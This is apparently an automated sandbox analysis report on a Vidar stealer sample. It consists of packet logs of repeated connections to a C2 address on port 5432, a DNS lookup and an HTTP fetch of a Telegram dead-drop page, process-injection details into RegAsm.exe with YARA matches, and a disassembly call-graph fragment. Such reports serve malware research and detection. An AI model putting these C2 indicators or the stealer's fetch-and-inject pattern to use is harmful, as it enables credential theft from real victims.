                                            Jun 7, 2024 17:21:17.551217079 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551239014 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551254034 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551286936 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551296949 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551320076 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551321030 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551342964 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551377058 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551377058 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551433086 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551438093 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551471949 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551506996 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551522970 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551523924 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551544905 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551579952 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551587105 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551594973 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551615953 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551651955 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551667929 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551667929 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551687956 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551723003 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551740885 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551740885 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551758051 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551793098 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551815033 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551815033 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551829100 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551862955 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551882029 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551882029 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551898003 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551918983 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551933050 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.551963091 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.551969051 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552002907 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552011013 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552037954 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552048922 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552048922 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552073002 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552107096 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552124023 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552124023 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552141905 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552179098 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552194118 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552194118 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552211046 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552239895 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552246094 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552280903 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552287102 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552314997 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552331924 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552333117 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552351952 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552386045 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552406073 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552406073 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552422047 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552455902 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552474976 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552474976 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552517891 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552525043 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552552938 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552589893 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552592993 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552604914 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552624941 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552661896 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.552666903 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552680016 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.552772045 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.657310963 CEST497155432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.657784939 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.662832975 CEST543249715116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.662878990 CEST543249717116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:17.663050890 CEST497155432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.663091898 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.663345098 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:17.668236971 CEST543249717116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:18.508065939 CEST543249717116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:18.511140108 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:18.511558056 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:18.513925076 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:18.513962984 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:18.516464949 CEST543249717116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:18.518994093 CEST543249717116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:18.519026041 CEST543249717116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:18.795936108 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:18.796438932 CEST497185432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:18.801481962 CEST543249718116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:18.801589012 CEST543249716116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:18.801649094 CEST497185432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:18.801685095 CEST497165432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:18.802043915 CEST497185432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:18.806957960 CEST543249718116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:19.174257994 CEST543249717116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:19.174345970 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:19.667491913 CEST543249718116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:19.667798042 CEST497185432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:19.668359041 CEST497185432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:19.670828104 CEST497185432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:19.673429966 CEST543249718116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:19.675780058 CEST543249718116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:19.961771011 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:19.962265015 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:19.968787909 CEST543249719116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:19.969166040 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:19.969166040 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:19.970429897 CEST543249717116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:19.970501900 CEST497175432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:19.975898981 CEST543249719116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:20.456638098 CEST543249718116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:20.456891060 CEST497185432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:20.823193073 CEST543249719116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:20.823297977 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:20.823671103 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:20.826066971 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:20.828552961 CEST543249719116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:20.831006050 CEST543249719116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:21.314388990 CEST497185432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:21.314951897 CEST497215432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:21.320019007 CEST543249718116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:21.320080996 CEST543249721116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:21.320090055 CEST497185432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:21.320156097 CEST497215432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:21.322946072 CEST497215432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:21.327848911 CEST543249721116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:21.520606041 CEST543249719116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:21.520786047 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:22.167879105 CEST543249721116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:22.167979002 CEST497215432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:22.168982983 CEST497215432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:22.173537970 CEST497215432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:22.173896074 CEST543249721116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:22.177944899 CEST497245432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:22.179204941 CEST543249721116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:22.179284096 CEST497215432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:22.182898998 CEST543249724116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:22.182976007 CEST497245432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:22.183320999 CEST497245432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:22.188182116 CEST543249724116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.050522089 CEST543249724116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.050597906 CEST497245432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.051089048 CEST497245432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.053745031 CEST497245432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.055943012 CEST543249724116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.056859970 CEST497275432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.058887005 CEST543249724116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.058968067 CEST497245432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.061717033 CEST543249727116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.061788082 CEST497275432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.062486887 CEST497275432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.067373037 CEST543249727116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.907316923 CEST543249727116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.907741070 CEST497275432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.908114910 CEST497275432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.913069010 CEST543249727116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.942745924 CEST497275432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.948476076 CEST543249727116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.948600054 CEST497295432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.948606014 CEST497275432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.953555107 CEST543249729116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:23.953665018 CEST497295432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.954025030 CEST497295432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:23.958966017 CEST543249729116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:24.985136032 CEST543249729116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:24.985222101 CEST497295432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:24.985809088 CEST497295432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:24.987963915 CEST497295432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:24.989233971 CEST497315432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:24.990719080 CEST543249729116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:24.993396997 CEST543249729116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:24.993459940 CEST497295432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:24.994303942 CEST543249731116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:24.994384050 CEST497315432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:24.994581938 CEST497315432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:24.999572992 CEST543249731116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:25.843137026 CEST543249731116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:25.843283892 CEST497315432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:25.843797922 CEST497315432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:25.848706007 CEST543249731116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:25.852128983 CEST497315432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:25.857450962 CEST543249731116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:25.857549906 CEST497315432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:25.857711077 CEST519845432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:25.862992048 CEST543251984116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:25.863076925 CEST519845432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:25.865555048 CEST519845432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:25.870470047 CEST543251984116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:26.707370043 CEST543251984116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:26.707676888 CEST519845432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:26.708149910 CEST519845432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:26.709861040 CEST519845432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:26.713129044 CEST543251984116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:26.715197086 CEST543251984116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:26.715358019 CEST519845432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:22:31.518407106 CEST543249719116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:22:31.518615961 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:22:31.642116070 CEST543249719116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:22:31.642221928 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:22:54.462007046 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:22:54.462039948 CEST497195432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:22:54.466979980 CEST543249719116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:22:54.467191935 CEST497195432192.168.2.5116.202.190.18
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jun 7, 2024 17:21:04.512676954 CEST5891353192.168.2.51.1.1.1
                                            Jun 7, 2024 17:21:04.519785881 CEST53589131.1.1.1192.168.2.5
                                            Jun 7, 2024 17:21:25.621989965 CEST53497951.1.1.1192.168.2.5
                                            Jun 7, 2024 17:21:40.356259108 CEST5355550162.159.36.2192.168.2.5
                                            Jun 7, 2024 17:21:40.977365971 CEST4990653192.168.2.51.1.1.1
                                            Jun 7, 2024 17:21:40.985791922 CEST53499061.1.1.1192.168.2.5
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jun 7, 2024 17:21:04.512676954 CEST192.168.2.51.1.1.10x9fe0Standard query (0)t.meA (IP address)IN (0x0001)false
                                            Jun 7, 2024 17:21:40.977365971 CEST192.168.2.51.1.1.10xb45fStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jun 7, 2024 17:21:04.519785881 CEST1.1.1.1192.168.2.50x9fe0No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                            Jun 7, 2024 17:21:40.985791922 CEST1.1.1.1192.168.2.50xb45fName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                            • t.me
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549708149.154.167.994432780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            TimestampBytes transferredDirectionData
                                            2024-06-07 15:21:05 UTC84OUTGET /r8z0l HTTP/1.1
                                            Host: t.me
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            2024-06-07 15:21:05 UTC511INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Fri, 07 Jun 2024 15:21:05 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 12303
                                            Connection: close
                                            Set-Cookie: stel_ssid=55a46eb7c12eec7355_2990827426554833759; expires=Sat, 08 Jun 2024 15:21:05 GMT; path=/; samesite=None; secure; HttpOnly
                                            Pragma: no-cache
                                            Cache-control: no-store
                                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                                            Strict-Transport-Security: max-age=35768000
                                            2024-06-07 15:21:05 UTC12303INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 72 38 7a 30 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e
                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @r8z0l</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:11:21:02
                                            Start date:07/06/2024
                                            Path:C:\Users\user\Desktop\file.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                            Imagebase:0xff0000
                                            File size:442'408 bytes
                                            MD5 hash:7DC8189F70CC34E18EA7AF8FDEAC4142
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:11:21:03
                                            Start date:07/06/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            Imagebase:0xa90000
                                            File size:65'440 bytes
                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:high
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:2.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:1.5%
                                              Total number of Nodes:1613
                                              Total number of Limit Nodes:39
                                              execution_graph 23953 1006b57 23954 1006b62 23953->23954 23958 1006b72 23953->23958 23959 1006b78 23954->23959 23957 1006f7b ___free_lconv_mon 14 API calls 23957->23958 23960 1006b93 23959->23960 23961 1006b8d 23959->23961 23963 1006f7b ___free_lconv_mon 14 API calls 23960->23963 23962 1006f7b ___free_lconv_mon 14 API calls 23961->23962 23962->23960 23964 1006b9f 23963->23964 23965 1006f7b ___free_lconv_mon 14 API calls 23964->23965 23966 1006baa 23965->23966 23967 1006f7b ___free_lconv_mon 14 API calls 23966->23967 23968 1006bb5 23967->23968 23969 1006f7b ___free_lconv_mon 14 API calls 23968->23969 23970 1006bc0 23969->23970 23971 1006f7b ___free_lconv_mon 14 API calls 23970->23971 23972 1006bcb 23971->23972 23973 1006f7b ___free_lconv_mon 14 API calls 23972->23973 23974 1006bd6 23973->23974 23975 1006f7b ___free_lconv_mon 14 API calls 23974->23975 23976 1006be1 23975->23976 23977 1006f7b ___free_lconv_mon 14 API calls 23976->23977 23978 1006bec 23977->23978 23979 1006f7b ___free_lconv_mon 14 API calls 23978->23979 23980 1006bfa 23979->23980 23985 10069a4 23980->23985 23986 10069b0 __FrameHandler3::FrameUnwindToState 23985->23986 24001 1000ecc EnterCriticalSection 23986->24001 23988 10069e4 24002 1006a03 23988->24002 23990 10069ba 23990->23988 23992 1006f7b ___free_lconv_mon 14 API calls 23990->23992 23992->23988 23993 1006a0f 23994 1006a1b __FrameHandler3::FrameUnwindToState 23993->23994 24006 1000ecc EnterCriticalSection 23994->24006 23996 1006a25 23997 1006c45 _unexpected 14 API calls 23996->23997 23998 1006a38 23997->23998 24007 1006a58 23998->24007 24001->23990 24005 1000f14 LeaveCriticalSection 24002->24005 24004 10069f1 24004->23993 24005->24004 24006->23996 24010 1000f14 LeaveCriticalSection 24007->24010 24009 1006a46 24009->23957 24010->24009 24610 fff205 24611 1001ef1 ___scrt_uninitialize_crt 70 API calls 24610->24611 24612 fff20d 24611->24612 24620 1007c92 24612->24620 24614 fff212 24615 1007d3d 14 API calls 24614->24615 24616 fff221 DeleteCriticalSection 24615->24616 24616->24614 24617 fff23c 24616->24617 24618 1006f7b ___free_lconv_mon 14 API calls 24617->24618 24619 fff247 24618->24619 24621 1007c9e __FrameHandler3::FrameUnwindToState 24620->24621 24630 1000ecc EnterCriticalSection 24621->24630 24623 1007d15 24631 1007d34 24623->24631 24625 1007ce9 DeleteCriticalSection 24628 1006f7b ___free_lconv_mon 14 API calls 24625->24628 24627 1001bb6 71 API calls 24629 1007ca9 24627->24629 24628->24629 24629->24623 24629->24625 24629->24627 24630->24629 24634 1000f14 LeaveCriticalSection 24631->24634 24633 1007d21 24633->24614 24634->24633 20705 ff6fd2 20728 ff6f33 GetModuleHandleExW 20705->20728 20708 ff7018 20710 ff6f33 Concurrency::details::_Reschedule_chore GetModuleHandleExW 20708->20710 20709 ff4eb2 50 API calls 20711 ff700c 20709->20711 20712 ff701e 20710->20712 20713 ff615f ReleaseSRWLockExclusive 20711->20713 20715 ff703f 20712->20715 20733 ff6f16 GetModuleHandleExW 20712->20733 20713->20708 20730 ff40e7 20715->20730 20716 ff702f 20716->20715 20717 ff7035 FreeLibraryWhenCallbackReturns 20716->20717 20717->20715 20719 ff6f33 Concurrency::details::_Reschedule_chore GetModuleHandleExW 20720 ff7055 20719->20720 20721 ff7083 20720->20721 20722 ff4eb2 50 API calls 20720->20722 20723 ff7061 20722->20723 20724 ff615f ReleaseSRWLockExclusive 20723->20724 20725 ff7074 20724->20725 20725->20721 20734 ff62e6 WakeAllConditionVariable 20725->20734 20729 ff6f49 20728->20729 20729->20708 20729->20709 20735 ff1ee2 20730->20735 20731 ff40f3 20731->20719 20733->20716 20734->20721 20736 ff1ef6 Concurrency::cancel_current_task 20735->20736 20737 ff1ef1 20735->20737 20736->20731 20738 ffb012 Concurrency::cancel_current_task RaiseException 20736->20738 20741 ff5237 VirtualAlloc 20737->20741 20739 ff55ea 20738->20739 20746 ff4951 20741->20746 20743 ff5257 ctype 20759 ff4937 20743->20759 20747 ff9cb4 codecvt 16 API calls 20746->20747 20748 ff496f 20747->20748 20749 ff498e 20748->20749 20750 ff2241 std::_Throw_Cpp_error 43 API calls 20748->20750 20751 ff49a2 20749->20751 20753 ff4623 std::_Throw_Cpp_error 41 API calls 20749->20753 20752 ff4983 20750->20752 20762 ff49cb 20751->20762 20772 ff2323 20752->20772 20753->20751 20756 ff49b3 _Deallocate 20757 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20756->20757 20758 ff49c9 20757->20758 20758->20743 21052 ff31a4 20759->21052 20763 ff4a4b 20762->20763 20764 ff49e7 20762->20764 20766 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20763->20766 20764->20763 20769 ff2241 std::_Throw_Cpp_error 43 API calls 20764->20769 20771 ff4623 std::_Throw_Cpp_error 41 API calls 20764->20771 20776 ff146b 20764->20776 20784 ff1e8b 20764->20784 20791 fff0ee 20764->20791 20767 ff4a57 20766->20767 20767->20756 20769->20764 20771->20764 20773 ff2330 20772->20773 21012 ff544a 20773->21012 20778 ff1477 